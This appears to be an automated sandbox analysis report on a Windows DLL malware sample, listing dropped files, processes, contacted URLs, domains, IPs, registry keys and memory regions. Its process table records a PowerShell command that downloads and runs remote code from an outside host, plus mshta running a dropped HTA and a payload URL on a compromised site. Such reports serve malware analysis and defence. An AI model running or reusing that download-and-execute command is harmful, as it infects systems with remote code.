Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
SecuriteInfo.com.W64.Agent.HHB.gen.Eldorado.13480.24581.dll
|
PE32+ executable (DLL) (GUI) x86-64 (stripped to external PDB), for MS Windows
|
initial sample
|
 |
|
|
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_Sec_d5ca91ef596fe7e4e742982047e0b177e5d14f7f_bf354edb_0c75f58c-7037-4d1e-9c38-442287c85576\Report.wer
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_Sec_d5ca91ef596fe7e4e742982047e0b177e5d14f7f_bf354edb_2b74b943-f3fa-438c-9397-424fb880d6ef\Report.wer
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_Sec_d5ca91ef596fe7e4e742982047e0b177e5d14f7f_bf354edb_41934ed9-944f-479a-b340-41bfe2a09559\Report.wer
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WER117D.tmp.WERInternalMetadata.xml
|
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WER119C.tmp.WERInternalMetadata.xml
|
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WER121A.tmp.xml
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WER12B7.tmp.xml
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WER2765.tmp.dmp
|
Mini DuMP crash report, 14 streams, Wed May 22 20:11:49 2024, 0x1205a4 type
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WER27C4.tmp.WERInternalMetadata.xml
|
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WER27F4.tmp.xml
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WERECC.tmp.dmp
|
Mini DuMP crash report, 14 streams, Wed May 22 20:11:43 2024, 0x1205a4 type
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WEREEB.tmp.dmp
|
Mini DuMP crash report, 14 streams, Wed May 22 20:11:43 2024, 0x1205a4 type
|
dropped
|
||
|
C:\Users\Public\example.hta
|
HTML document, ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\d[1].txt
|
HTML document, ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5uf4kdep.p5r.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gkfekeji.ezp.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q5mzev23.25y.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u3eqbjla.aiz.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Windows\appcompat\Programs\Amcache.hve
|
MS Windows registry file, NT/2000 or above
|
dropped
|
There are 12 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\rundll32.exe
|
rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.W64.Agent.HHB.gen.Eldorado.13480.24581.dll,hash
|
|
|
|
C:\Windows\System32\rundll32.exe
|
rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W64.Agent.HHB.gen.Eldorado.13480.24581.dll",#1
|
|
|
|
C:\Windows\System32\rundll32.exe
|
rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.W64.Agent.HHB.gen.Eldorado.13480.24581.dll,xlAutoOpen
|
|
|
|
C:\Windows\SysWOW64\mshta.exe
|
"C:\Windows\SysWOW64\mshta.exe" "C:\users\public\example.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
mshta
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (irm -Uri 'iapartmentlistings.com/tykhwuxk')
|
|
|
|
C:\Windows\System32\rundll32.exe
|
rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W64.Agent.HHB.gen.Eldorado.13480.24581.dll",hash
|
|
|
|
C:\Windows\System32\rundll32.exe
|
rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W64.Agent.HHB.gen.Eldorado.13480.24581.dll",xlAutoOpen
|
|
|
|
C:\Windows\SysWOW64\mshta.exe
|
"C:\Windows\SysWOW64\mshta.exe" "C:\users\public\example.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
mshta
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (irm -Uri 'iapartmentlistings.com/tykhwuxk')
|
|
|
|
C:\Windows\System32\loaddll64.exe
|
loaddll64.exe "C:\Users\user\Desktop\SecuriteInfo.com.W64.Agent.HHB.gen.Eldorado.13480.24581.dll"
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\cmd.exe
|
cmd.exe /C rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W64.Agent.HHB.gen.Eldorado.13480.24581.dll",#1
|
||
|
C:\Windows\System32\WerFault.exe
|
C:\Windows\system32\WerFault.exe -u -p 6940 -s 432
|
||
|
C:\Windows\System32\WerFault.exe
|
C:\Windows\system32\WerFault.exe -u -p 6896 -s 424
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\WerFault.exe
|
C:\Windows\system32\WerFault.exe -u -p 7332 -s 424
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
There are 7 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://www.siguefutbol.com/wp-content/plugins/wp-automatic/d.txt
|
194.124.213.167
|
|
|
|
https://www.siguefutbol.com/wp-content/plugins/wp-automatic/d.txt7
|
unknown
|
||
|
http://iapartmentlistings.com/tykhwuxk
|
91.222.173.38
|
||
|
http://upx.sf.net
|
unknown
|
||
|
https://www.siguefutbol.com/wp-content/plugins/wp-automatic/d.txt%O
|
unknown
|
||
|
https://www.siguefutbol.com/
|
unknown
|
||
|
https://www.siguefutbol.com/wp-content/plugins/wp-automatic/d.txtmO8
|
unknown
|
||
|
https://www.siguefutbol.com/wp-content/plugins/wp-automatic/d.txtmshtaopen073322f9fed87571973182f7de
|
unknown
|
||
|
https://www.siguefutbol.com/N
|
unknown
|
||
|
https://www.siguefutbol.com/wp-content/plugins/wp-automatic/d.txtj
|
unknown
|
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
iapartmentlistings.com
|
91.222.173.38
|
|
|
|
siguefutbol.com
|
194.124.213.167
|
|
|
|
www.siguefutbol.com
|
unknown
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
194.124.213.167
|
siguefutbol.com
|
unknown
|
|
|
|
91.222.173.38
|
iapartmentlistings.com
|
Ukraine
|
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
\REGISTRY\A\{5a34eef4-fa80-ead6-5326-26b58b01305d}\Root\InventoryApplicationFile\rundll32.exe|c8d854bf61fafc41
|
ProgramId
|
||
|
\REGISTRY\A\{5a34eef4-fa80-ead6-5326-26b58b01305d}\Root\InventoryApplicationFile\rundll32.exe|c8d854bf61fafc41
|
FileId
|
||
|
\REGISTRY\A\{5a34eef4-fa80-ead6-5326-26b58b01305d}\Root\InventoryApplicationFile\rundll32.exe|c8d854bf61fafc41
|
LowerCaseLongPath
|
||
|
\REGISTRY\A\{5a34eef4-fa80-ead6-5326-26b58b01305d}\Root\InventoryApplicationFile\rundll32.exe|c8d854bf61fafc41
|
LongPathHash
|
||
|
\REGISTRY\A\{5a34eef4-fa80-ead6-5326-26b58b01305d}\Root\InventoryApplicationFile\rundll32.exe|c8d854bf61fafc41
|
Name
|
||
|
\REGISTRY\A\{5a34eef4-fa80-ead6-5326-26b58b01305d}\Root\InventoryApplicationFile\rundll32.exe|c8d854bf61fafc41
|
OriginalFileName
|
||
|
\REGISTRY\A\{5a34eef4-fa80-ead6-5326-26b58b01305d}\Root\InventoryApplicationFile\rundll32.exe|c8d854bf61fafc41
|
Publisher
|
||
|
\REGISTRY\A\{5a34eef4-fa80-ead6-5326-26b58b01305d}\Root\InventoryApplicationFile\rundll32.exe|c8d854bf61fafc41
|
Version
|
||
|
\REGISTRY\A\{5a34eef4-fa80-ead6-5326-26b58b01305d}\Root\InventoryApplicationFile\rundll32.exe|c8d854bf61fafc41
|
BinFileVersion
|
||
|
\REGISTRY\A\{5a34eef4-fa80-ead6-5326-26b58b01305d}\Root\InventoryApplicationFile\rundll32.exe|c8d854bf61fafc41
|
BinaryType
|
||
|
\REGISTRY\A\{5a34eef4-fa80-ead6-5326-26b58b01305d}\Root\InventoryApplicationFile\rundll32.exe|c8d854bf61fafc41
|
ProductName
|
||
|
\REGISTRY\A\{5a34eef4-fa80-ead6-5326-26b58b01305d}\Root\InventoryApplicationFile\rundll32.exe|c8d854bf61fafc41
|
ProductVersion
|
||
|
\REGISTRY\A\{5a34eef4-fa80-ead6-5326-26b58b01305d}\Root\InventoryApplicationFile\rundll32.exe|c8d854bf61fafc41
|
LinkDate
|
||
|
\REGISTRY\A\{5a34eef4-fa80-ead6-5326-26b58b01305d}\Root\InventoryApplicationFile\rundll32.exe|c8d854bf61fafc41
|
BinProductVersion
|
||
|
\REGISTRY\A\{5a34eef4-fa80-ead6-5326-26b58b01305d}\Root\InventoryApplicationFile\rundll32.exe|c8d854bf61fafc41
|
AppxPackageFullName
|
||
|
\REGISTRY\A\{5a34eef4-fa80-ead6-5326-26b58b01305d}\Root\InventoryApplicationFile\rundll32.exe|c8d854bf61fafc41
|
AppxPackageRelativeId
|
||
|
\REGISTRY\A\{5a34eef4-fa80-ead6-5326-26b58b01305d}\Root\InventoryApplicationFile\rundll32.exe|c8d854bf61fafc41
|
Size
|
||
|
\REGISTRY\A\{5a34eef4-fa80-ead6-5326-26b58b01305d}\Root\InventoryApplicationFile\rundll32.exe|c8d854bf61fafc41
|
Language
|
||
|
\REGISTRY\A\{5a34eef4-fa80-ead6-5326-26b58b01305d}\Root\InventoryApplicationFile\rundll32.exe|c8d854bf61fafc41
|
IsOsComponent
|
||
|
\REGISTRY\A\{5a34eef4-fa80-ead6-5326-26b58b01305d}\Root\InventoryApplicationFile\rundll32.exe|c8d854bf61fafc41
|
Usn
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
LangID
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\SysWOW64\mshta.exe.FriendlyAppName
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\SysWOW64\mshta.exe.ApplicationCompany
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 28 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
5AB8000
|
heap
|
page read and write
|
||
|
19966358000
|
heap
|
page read and write
|
||
|
BFFA7E000
|
stack
|
page read and write
|
||
|
3295000
|
heap
|
page read and write
|
||
|
1DEEE240000
|
heap
|
page read and write
|
||
|
717000
|
heap
|
page read and write
|
||
|
19967DD0000
|
heap
|
page read and write
|
||
|
31BE000
|
stack
|
page read and write
|
||
|
1C9000
|
stack
|
page read and write
|
||
|
3276000
|
heap
|
page read and write
|
||
|
71F000
|
heap
|
page read and write
|
||
|
69F000
|
heap
|
page read and write
|
||
|
3295000
|
heap
|
page read and write
|
||
|
99D4000
|
trusted library allocation
|
page read and write
|
||
|
530000
|
heap
|
page read and write
|
||
|
A809000
|
heap
|
page read and write
|
||
|
681000
|
heap
|
page read and write
|
||
|
20AEF3EF000
|
heap
|
page read and write
|
||
|
65D9000
|
heap
|
page read and write
|
||
|
706000
|
heap
|
page read and write
|
||
|
805957E000
|
stack
|
page read and write
|
||
|
49A4000
|
heap
|
page read and write
|
||
|
5200000
|
heap
|
page read and write
|
||
|
3216000
|
heap
|
page read and write
|
||
|
3020000
|
heap
|
page read and write
|
||
|
3281000
|
heap
|
page read and write
|
||
|
7FFE148B0000
|
unkown
|
page readonly
|
||
|
20AEF710000
|
heap
|
page read and write
|
||
|
6B8000
|
heap
|
page read and write
|
||
|
19966470000
|
heap
|
page read and write
|
||
|
65EF000
|
heap
|
page read and write
|
||
|
6EF000
|
heap
|
page read and write
|
||
|
BFF9FF000
|
stack
|
page read and write
|
||
|
7FFE148B1000
|
unkown
|
page execute read
|
||
|
5ACC000
|
heap
|
page read and write
|
||
|
9869000
|
heap
|
page read and write
|
||
|
320F000
|
heap
|
page read and write
|
||
|
C6F2EFE000
|
stack
|
page read and write
|
||
|
99D0000
|
trusted library allocation
|
page read and write
|
||
|
9A80000
|
heap
|
page read and write
|
||
|
4F40000
|
trusted library allocation
|
page read and write
|
||
|
630000
|
heap
|
page read and write
|
||
|
3272000
|
heap
|
page read and write
|
||
|
6CD000
|
heap
|
page read and write
|
||
|
5AD5000
|
heap
|
page read and write
|
||
|
9D128F7000
|
stack
|
page read and write
|
||
|
7FFE148B1000
|
unkown
|
page execute read
|
||
|
65EE000
|
heap
|
page read and write
|
||
|
65B8000
|
heap
|
page read and write
|
||
|
65EF000
|
heap
|
page read and write
|
||
|
5076000
|
heap
|
page read and write
|
||
|
3286000
|
heap
|
page read and write
|
||
|
329B000
|
heap
|
page read and write
|
||
|
9AE2E7E000
|
stack
|
page read and write
|
||
|
53D4000
|
heap
|
page read and write
|
||
|
65D2000
|
heap
|
page read and write
|
||
|
3276000
|
heap
|
page read and write
|
||
|
3286000
|
heap
|
page read and write
|
||
|
1DEEE1A0000
|
heap
|
page read and write
|
||
|
9851000
|
heap
|
page read and write
|
||
|
65EB000
|
heap
|
page read and write
|
||
|
5AD7000
|
heap
|
page read and write
|
||
|
5AD5000
|
heap
|
page read and write
|
||
|
69F000
|
heap
|
page read and write
|
||
|
9D12186000
|
stack
|
page read and write
|
||
|
65E3000
|
heap
|
page read and write
|
||
|
973E000
|
stack
|
page read and write
|
||
|
33E0000
|
trusted library allocation
|
page read and write
|
||
|
65F4000
|
heap
|
page read and write
|
||
|
65E3000
|
heap
|
page read and write
|
||
|
6DC000
|
heap
|
page read and write
|
||
|
32B7000
|
heap
|
page read and write
|
||
|
65D1000
|
heap
|
page read and write
|
||
|
65E3000
|
heap
|
page read and write
|
||
|
28BF8260000
|
heap
|
page read and write
|
||
|
674000
|
heap
|
page read and write
|
||
|
2CFA000
|
stack
|
page read and write
|
||
|
32BC000
|
heap
|
page read and write
|
||
|
65E3000
|
heap
|
page read and write
|
||
|
6570000
|
heap
|
page read and write
|
||
|
5A92000
|
heap
|
page read and write
|
||
|
9D1257F000
|
stack
|
page read and write
|
||
|
32BD000
|
heap
|
page read and write
|
||
|
1F0D53C0000
|
heap
|
page read and write
|
||
|
3286000
|
heap
|
page read and write
|
||
|
1DEEE3F5000
|
heap
|
page read and write
|
||
|
57E000
|
stack
|
page read and write
|
||
|
BFF8FE000
|
stack
|
page read and write
|
||
|
6605000
|
heap
|
page read and write
|
||
|
5070000
|
heap
|
page read and write
|
||
|
327B000
|
heap
|
page read and write
|
||
|
65EB000
|
heap
|
page read and write
|
||
|
65CB000
|
heap
|
page read and write
|
||
|
1F0D522F000
|
heap
|
page read and write
|
||
|
BFF6FF000
|
stack
|
page read and write
|
||
|
5B0E000
|
stack
|
page read and write
|
||
|
32C6000
|
heap
|
page read and write
|
||
|
BFF87D000
|
stack
|
page read and write
|
||
|
65E3000
|
heap
|
page read and write
|
||
|
65EA000
|
heap
|
page read and write
|
||
|
67D000
|
heap
|
page read and write
|
||
|
718000
|
heap
|
page read and write
|
||
|
80594FE000
|
stack
|
page read and write
|
||
|
5ACC000
|
heap
|
page read and write
|
||
|
329D000
|
heap
|
page read and write
|
||
|
9D126FE000
|
stack
|
page read and write
|
||
|
348A000
|
heap
|
page read and write
|
||
|
6605000
|
heap
|
page read and write
|
||
|
714000
|
heap
|
page read and write
|
||
|
3241000
|
heap
|
page read and write
|
||
|
31D8000
|
heap
|
page read and write
|
||
|
AEA000
|
heap
|
page read and write
|
||
|
329E000
|
heap
|
page read and write
|
||
|
6FD000
|
heap
|
page read and write
|
||
|
805947C000
|
stack
|
page read and write
|
||
|
6605000
|
heap
|
page read and write
|
||
|
28BF6600000
|
heap
|
page read and write
|
||
|
3281000
|
heap
|
page read and write
|
||
|
65DA000
|
heap
|
page read and write
|
||
|
316E000
|
stack
|
page read and write
|
||
|
53D0000
|
heap
|
page read and write
|
||
|
4F7000
|
stack
|
page read and write
|
||
|
5AD5000
|
heap
|
page read and write
|
||
|
6D8000
|
heap
|
page read and write
|
||
|
28BF66E0000
|
heap
|
page read and write
|
||
|
63CE000
|
stack
|
page read and write
|
||
|
28E75740000
|
heap
|
page read and write
|
||
|
65E6000
|
heap
|
page read and write
|
||
|
5C5000
|
heap
|
page read and write
|
||
|
9AF2000
|
trusted library allocation
|
page read and write
|
||
|
8CF0B7F000
|
stack
|
page read and write
|
||
|
3256000
|
heap
|
page read and write
|
||
|
6605000
|
heap
|
page read and write
|
||
|
31EE000
|
heap
|
page read and write
|
||
|
2DF7000
|
stack
|
page read and write
|
||
|
65DF000
|
heap
|
page read and write
|
||
|
32AD000
|
heap
|
page read and write
|
||
|
3295000
|
heap
|
page read and write
|
||
|
6FD000
|
heap
|
page read and write
|
||
|
5AB8000
|
heap
|
page read and write
|
||
|
65EE000
|
heap
|
page read and write
|
||
|
3272000
|
heap
|
page read and write
|
||
|
327B000
|
heap
|
page read and write
|
||
|
65D9000
|
heap
|
page read and write
|
||
|
33F3000
|
heap
|
page read and write
|
||
|
65E0000
|
heap
|
page read and write
|
||
|
8FE000
|
stack
|
page read and write
|
||
|
6DC000
|
heap
|
page read and write
|
||
|
65EB000
|
heap
|
page read and write
|
||
|
5A90000
|
heap
|
page read and write
|
||
|
1DEEE3F0000
|
heap
|
page read and write
|
||
|
7FFE148B9000
|
unkown
|
page read and write
|
||
|
6EF000
|
heap
|
page read and write
|
||
|
28E73AD0000
|
heap
|
page read and write
|
||
|
A83000
|
heap
|
page read and write
|
||
|
326A000
|
heap
|
page read and write
|
||
|
9D1277E000
|
stack
|
page read and write
|
||
|
64CF000
|
stack
|
page read and write
|
||
|
28BF6800000
|
heap
|
page read and write
|
||
|
65D9000
|
heap
|
page read and write
|
||
|
20AF1280000
|
remote allocation
|
page read and write
|
||
|
9AE2BCF000
|
stack
|
page read and write
|
||
|
6FE000
|
heap
|
page read and write
|
||
|
65CB000
|
heap
|
page read and write
|
||
|
9D1287F000
|
stack
|
page read and write
|
||
|
A809000
|
heap
|
page read and write
|
||
|
3274000
|
heap
|
page read and write
|
||
|
A81F000
|
heap
|
page read and write
|
||
|
3295000
|
heap
|
page read and write
|
||
|
64E000
|
heap
|
page read and write
|
||
|
9D1C000
|
stack
|
page read and write
|
||
|
705000
|
heap
|
page read and write
|
||
|
65D9000
|
heap
|
page read and write
|
||
|
3295000
|
heap
|
page read and write
|
||
|
28E73AB0000
|
heap
|
page read and write
|
||
|
6DC000
|
heap
|
page read and write
|
||
|
7FFE148B0000
|
unkown
|
page readonly
|
||
|
32A6000
|
heap
|
page read and write
|
||
|
5ADB000
|
heap
|
page read and write
|
||
|
9861000
|
heap
|
page read and write
|
||
|
3025000
|
heap
|
page read and write
|
||
|
C6F2FFF000
|
stack
|
page read and write
|
||
|
65D1000
|
heap
|
page read and write
|
||
|
6605000
|
heap
|
page read and write
|
||
|
20AF1280000
|
remote allocation
|
page read and write
|
||
|
4EAF000
|
stack
|
page read and write
|
||
|
6D9000
|
heap
|
page read and write
|
||
|
9AE2EFF000
|
stack
|
page read and write
|
||
|
A809000
|
heap
|
page read and write
|
||
|
1DEEE180000
|
heap
|
page read and write
|
||
|
65EB000
|
heap
|
page read and write
|
||
|
324C000
|
heap
|
page read and write
|
||
|
A40000
|
heap
|
page read and write
|
||
|
6EF000
|
heap
|
page read and write
|
||
|
65B6000
|
heap
|
page read and write
|
||
|
32C0000
|
heap
|
page read and write
|
||
|
20AEF3AE000
|
heap
|
page read and write
|
||
|
3470000
|
heap
|
page read and write
|
||
|
4610000
|
heap
|
page read and write
|
||
|
6EF000
|
heap
|
page read and write
|
||
|
327E000
|
heap
|
page read and write
|
||
|
71F000
|
heap
|
page read and write
|
||
|
7FFE148B4000
|
unkown
|
page readonly
|
||
|
20AF1290000
|
heap
|
page read and write
|
||
|
8CF0AFF000
|
stack
|
page read and write
|
||
|
6D1000
|
heap
|
page read and write
|
||
|
32A2000
|
heap
|
page read and write
|
||
|
720000
|
heap
|
page read and write
|
||
|
6EF000
|
heap
|
page read and write
|
||
|
5ADB000
|
heap
|
page read and write
|
||
|
65D9000
|
heap
|
page read and write
|
||
|
20AEF440000
|
heap
|
page read and write
|
||
|
6FD000
|
heap
|
page read and write
|
||
|
67CF000
|
stack
|
page read and write
|
||
|
20AEF3D2000
|
heap
|
page read and write
|
||
|
6D1000
|
heap
|
page read and write
|
||
|
28E73B3D000
|
heap
|
page read and write
|
||
|
6C7000
|
heap
|
page read and write
|
||
|
65EB000
|
heap
|
page read and write
|
||
|
3170000
|
heap
|
page read and write
|
||
|
AC0000
|
heap
|
page read and write
|
||
|
638000
|
heap
|
page read and write
|
||
|
65EC000
|
heap
|
page read and write
|
||
|
20AF1280000
|
remote allocation
|
page read and write
|
||
|
6CE000
|
heap
|
page read and write
|
||
|
65D2000
|
heap
|
page read and write
|
||
|
32A1000
|
heap
|
page read and write
|
||
|
9D127FB000
|
stack
|
page read and write
|
||
|
3256000
|
heap
|
page read and write
|
||
|
65E0000
|
heap
|
page read and write
|
||
|
32A2000
|
heap
|
page read and write
|
||
|
6605000
|
heap
|
page read and write
|
||
|
5C0000
|
heap
|
page read and write
|
||
|
65EB000
|
heap
|
page read and write
|
||
|
9860000
|
heap
|
page read and write
|
||
|
327D000
|
heap
|
page read and write
|
||
|
32B8000
|
heap
|
page read and write
|
||
|
701000
|
heap
|
page read and write
|
||
|
65B8000
|
heap
|
page read and write
|
||
|
65D9000
|
heap
|
page read and write
|
||
|
65E0000
|
heap
|
page read and write
|
||
|
A7FB000
|
heap
|
page read and write
|
||
|
3272000
|
heap
|
page read and write
|
||
|
324C000
|
heap
|
page read and write
|
||
|
67D000
|
heap
|
page read and write
|
||
|
6E0000
|
heap
|
page read and write
|
||
|
71E000
|
heap
|
page read and write
|
||
|
69A000
|
heap
|
page read and write
|
||
|
3286000
|
heap
|
page read and write
|
||
|
6DC000
|
heap
|
page read and write
|
||
|
1F0D5180000
|
heap
|
page read and write
|
||
|
4DAE000
|
stack
|
page read and write
|
||
|
AA40000
|
trusted library allocation
|
page read and write
|
||
|
6FD000
|
heap
|
page read and write
|
||
|
983F000
|
stack
|
page read and write
|
||
|
9D1267D000
|
stack
|
page read and write
|
||
|
6EF000
|
heap
|
page read and write
|
||
|
5AB6000
|
heap
|
page read and write
|
||
|
6605000
|
heap
|
page read and write
|
||
|
6605000
|
heap
|
page read and write
|
||
|
3241000
|
heap
|
page read and write
|
||
|
662000
|
heap
|
page read and write
|
||
|
32A1000
|
heap
|
page read and write
|
||
|
66CE000
|
stack
|
page read and write
|
||
|
5AD5000
|
heap
|
page read and write
|
||
|
20AF0E90000
|
heap
|
page read and write
|
||
|
A80000
|
heap
|
page read and write
|
||
|
323F000
|
heap
|
page read and write
|
||
|
461F000
|
heap
|
page read and write
|
||
|
322E000
|
heap
|
page read and write
|
||
|
6FD000
|
heap
|
page read and write
|
||
|
5ADB000
|
heap
|
page read and write
|
||
|
3227000
|
heap
|
page read and write
|
||
|
587E000
|
stack
|
page read and write
|
||
|
20AEF41D000
|
heap
|
page read and write
|
||
|
7FFE148B4000
|
unkown
|
page readonly
|
||
|
1DEEE0A0000
|
heap
|
page read and write
|
||
|
AA44000
|
trusted library allocation
|
page read and write
|
||
|
5AD5000
|
heap
|
page read and write
|
||
|
321C000
|
heap
|
page read and write
|
||
|
9A5E000
|
stack
|
page read and write
|
||
|
6590000
|
heap
|
page read and write
|
||
|
65E6000
|
heap
|
page read and write
|
||
|
329C000
|
heap
|
page read and write
|
||
|
A10000
|
heap
|
page read and write
|
||
|
5AE1000
|
heap
|
page read and write
|
||
|
32A7000
|
heap
|
page read and write
|
||
|
5ADB000
|
heap
|
page read and write
|
||
|
20AEF715000
|
heap
|
page read and write
|
||
|
6605000
|
heap
|
page read and write
|
||
|
31D0000
|
heap
|
page read and write
|
||
|
65B6000
|
heap
|
page read and write
|
||
|
9E1C000
|
stack
|
page read and write
|
||
|
6B7000
|
heap
|
page read and write
|
||
|
4FA000
|
stack
|
page read and write
|
||
|
28BF6995000
|
heap
|
page read and write
|
||
|
28E73B30000
|
heap
|
page read and write
|
||
|
671000
|
heap
|
page read and write
|
||
|
6F6000
|
heap
|
page read and write
|
||
|
65EE000
|
heap
|
page read and write
|
||
|
3486000
|
heap
|
page read and write
|
||
|
199664A0000
|
heap
|
page read and write
|
||
|
67D000
|
heap
|
page read and write
|
||
|
6E0000
|
heap
|
page read and write
|
||
|
6593000
|
heap
|
page read and write
|
||
|
324C000
|
heap
|
page read and write
|
||
|
1F0D51F0000
|
heap
|
page read and write
|
||
|
28E73B39000
|
heap
|
page read and write
|
||
|
28BF6708000
|
heap
|
page read and write
|
||
|
5B90000
|
trusted library allocation
|
page read and write
|
||
|
20AEF520000
|
heap
|
page read and write
|
||
|
7FFE148B1000
|
unkown
|
page execute read
|
||
|
1F0D5188000
|
heap
|
page read and write
|
||
|
7FFE148B4000
|
unkown
|
page readonly
|
||
|
6FA000
|
heap
|
page read and write
|
||
|
5ADB000
|
heap
|
page read and write
|
||
|
28E73AA0000
|
heap
|
page read and write
|
||
|
6592000
|
heap
|
page read and write
|
||
|
28BF6990000
|
heap
|
page read and write
|
||
|
65CF000
|
heap
|
page read and write
|
||
|
65CB000
|
heap
|
page read and write
|
||
|
3241000
|
heap
|
page read and write
|
||
|
65D9000
|
heap
|
